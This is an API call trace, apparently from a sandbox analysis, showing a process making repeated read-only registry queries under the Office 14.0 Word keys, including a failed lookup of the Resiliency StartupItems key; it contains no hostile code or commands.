[0086.607] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3e8) returned 0x0
[0086.607] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.608] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3e8) returned 0x0
[0086.608] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.608] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3e8) returned 0x0
[0086.608] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.608] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.608] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.608] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.608] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.608] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3e8) returned 0x0
[0086.608] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.608] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3e8) returned 0x0
[0086.608] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.608] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3e8) returned 0x0
[0086.608] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.609] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.609] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.609] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.609] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.609] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3e8) returned 0x0
[0086.609] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.609] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3e8) returned 0x0
[0086.609] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.609] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3e8) returned 0x0
[0086.609] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.609] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.609] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.609] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.609] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.610] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3e8) returned 0x0
[0086.610] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.610] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3e8) returned 0x0
[0086.610] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.610] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3e8) returned 0x0
[0086.610] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.610] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.610] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.610] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.610] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.610] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3e8) returned 0x0
[0086.610] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.610] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x3e8) returned 0x0
[0086.610] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.611] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x0) returned 0x2
[0086.611] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.611] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3e8) returned 0x0
[0086.611] RegQueryInfoKeyW (in: hKey=0x3e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.611] RegOpenKeyExW (in: hKey=0x3e8, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3c0) returned 0x0
[0086.611] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.611] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.611] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3e8) returned 0x0
[0086.611] RegCloseKey (hKey=0x3c0) returned 0x0
[0086.611] RegQueryInfoKeyW (in: hKey=0x3e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.611] RegOpenKeyExW (in: hKey=0x3e8, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3c0) returned 0x0
[0086.612] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.612] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.612] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3e8) returned 0x0
[0086.612] RegCloseKey (hKey=0x3c0) returned 0x0
[0086.612] RegQueryInfoKeyW (in: hKey=0x3e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.612] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0086.612] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.612] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c0) returned 0x0
[0086.612] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.612] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x430) returned 0x0
[0086.612] RegCloseKey (hKey=0x3c0) returned 0x0
[0086.612] RegQueryInfoKeyW (in: hKey=0x430, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.612] RegOpenKeyExW (in: hKey=0x430, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c0) returned 0x0
[0086.612] RegCloseKey (hKey=0x430) returned 0x0
[0086.612] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.613] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x430) returned 0x0
[0086.613] RegCloseKey (hKey=0x3c0) returned 0x0
[0086.613] RegQueryInfoKeyW (in: hKey=0x430, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.613] RegOpenKeyExW (in: hKey=0x430, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3c0) returned 0x0
[0086.613] RegCloseKey (hKey=0x430) returned 0x0
[0086.613] RegQueryInfoKeyW (in: hKey=0x3c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.613] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0086.613] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.613] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x0) returned 0x2
[0086.613] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.613] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x430) returned 0x0
[0086.613] RegQueryInfoKeyW (in: hKey=0x430, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.613] RegOpenKeyExW (in: hKey=0x430, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x438) returned 0x0
[0086.613] RegCloseKey (hKey=0x430) returned 0x0
[0086.614] RegQueryInfoKeyW (in: hKey=0x438, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.614] RegOpenKeyExW (in: hKey=0x438, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x430) returned 0x0
[0086.614] RegCloseKey (hKey=0x438) returned 0x0
[0086.614] RegQueryInfoKeyW (in: hKey=0x430, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.614] RegOpenKeyExW (in: hKey=0x430, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x438) returned 0x0
[0086.614] RegCloseKey (hKey=0x430) returned 0x0
[0086.614] RegQueryInfoKeyW (in: hKey=0x438, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.614] RegOpenKeyExW (in: hKey=0x438, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x430) returned 0x0
[0086.614] RegCloseKey (hKey=0x438) returned 0x0
[0086.614] RegQueryInfoKeyW (in: hKey=0x430, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c84c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c84c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c848*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.614] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x0) returned 0x2
[0086.614] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.614] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x438) returned 0x0
[0086.614] RegQueryInfoKeyW (in: hKey=0x438, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.614] RegOpenKeyExW (in: hKey=0x438, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.615] RegCloseKey (hKey=0x438) returned 0x0
[0086.615] RegQueryInfoKeyW (in: hKey=0x43c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.615] RegOpenKeyExW (in: hKey=0x43c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x438) returned 0x0
[0086.615] RegCloseKey (hKey=0x43c) returned 0x0
[0086.615] RegQueryInfoKeyW (in: hKey=0x438, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c92c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c92c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c928*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.615] RegOpenKeyExW (in: hKey=0x438, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x43c) returned 0x0
[0086.615] RegCloseKey (hKey=0x438) returned 0x0
